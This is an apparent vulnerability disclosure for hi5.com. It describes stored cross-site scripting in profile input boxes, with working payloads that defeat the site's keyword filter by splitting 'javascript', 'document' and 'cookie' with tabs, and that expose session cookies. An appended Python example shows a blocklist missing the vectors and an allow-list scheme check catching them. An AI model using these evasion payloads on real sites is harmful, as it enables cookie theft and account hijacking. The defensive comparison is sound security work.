hi5.com - XSS with cookie disclosure
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes for editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows a lot of HTML tags to be used on their site, but they
filter out words like javascript, applet, and iframe tags (which is to be
expected). Here's a link to the page that lists all the tags they will and won't
allow:
http://hi5.com/friend/account/html_tips.html
How do we get around this? Well, to get around the javascript filtering we use
an embedded encoded tab to break up the word javascript: the filter's string
match no longer sees the word, but the browser ignores the tab when it parses
the URL scheme and runs the script anyway. Below are a few examples of it. For
PoC try putting this in your profile. (I used the Hometown box, all should work
though):
<IMG SRC="jav	ascript:alert('XSS');">
or
<DIV STYLE="background-image: url(jav	ascript:al	ert('XSS'))">
Why do we have to use an embedded encoded tab in the word "alert" in a div tag
and not an img tag? I have no idea!
Screenshots:
http://www.youfucktard.com/xsp/hi52.jpg
http://www.youfucktard.com/xsp/hi53.jpg
WHERE'S THE COOKIE?!?!
Now let's change that so we can show our cookie data. Since they don't seem to
allow the words document and cookie, let's use the same method above to break
them up. Try putting:
Popup alert:
<IMG SRC="jav	ascript:alert(docu	ment.coo	kie);">
Write on screen:
<IMG SRC="jav	ascript:docu	ment.write(docu	ment.cookie);">
Our Cookie:
Screenshots:
http://www.youfucktard.com/xsp/hi54.jpg
http://www.youfucktard.com/xsp/hi55.jpg
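The word-splitting trick above works because the browser drops the tab when it reads the URL scheme, while a substring filter compares the raw text. As an added example (not part of the original advisory, and not hi5's code), the Python below shows such a blocklist missing the advisory's vectors and a normalising allow-list check on URL schemes catching them; the payload set, the blocklist word list and the example.invalid URL are constructed here from the advisory's text.

```python
import html
import re

# Constructed samples: the advisory's tab-split vectors with a literal 0x09
# between the letters, an entity-encoded tab variant, and a harmless image URL.
PAYLOADS = {
    "img_js": '<IMG SRC="jav\tascript:alert(\'XSS\');">',
    "div_css": '<DIV STYLE="background-image: url(jav\tascript:al\tert(\'XSS\'))">',
    "img_cookie": '<IMG SRC="jav\tascript:alert(docu\tment.coo\tkie);">',
    "img_entity": '<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">',
    "benign": '<IMG SRC="http://example.invalid/pic.jpg">',
}
BLOCKLIST = ("javascript", "applet", "iframe", "document", "cookie")

def naive_filter_blocks(markup: str) -> bool:
    """Substring blocklist of the kind the advisory defeats: it only matches
    the intact word, so 'jav<TAB>ascript' passes straight through."""
    lowered = markup.lower()
    return any(word in lowered for word in BLOCKLIST)

# Browsers skip ASCII whitespace/control bytes inside a URL scheme, so the
# check must drop them (after decoding entities like &#x09;) before comparing.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
_ATTR_URL = re.compile(
    r"""(?:src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))"""
    r"""|url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\)""",
    re.IGNORECASE,
)

def scheme_of(value: str) -> str:
    """Return the scheme a browser would act on: entity-decode, strip the
    ignored bytes, lowercase, then read up to the first colon ('' = relative)."""
    cleaned = _CTRL_WS.sub("", html.unescape(value)).lower()
    m = _SCHEME.match(cleaned)
    return m.group(1) if m else ""

def unsafe_scheme_present(markup: str) -> bool:
    """Allow-list check: every URL-bearing attribute (src/href/CSS url()) must
    resolve to http, https or a relative reference; anything else is rejected."""
    for m in _ATTR_URL.finditer(markup):
        raw = next(g for g in m.groups() if g is not None)
        if scheme_of(raw) not in ("", "http", "https"):
            return True
    return False

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "blocklist:", naive_filter_blocks(payload), "allowlist rejects:", unsafe_scheme_present(payload))
```

The same normalise-then-allow-list step applies to any attribute that takes a URL, which is why checking the parsed scheme beats growing the word list.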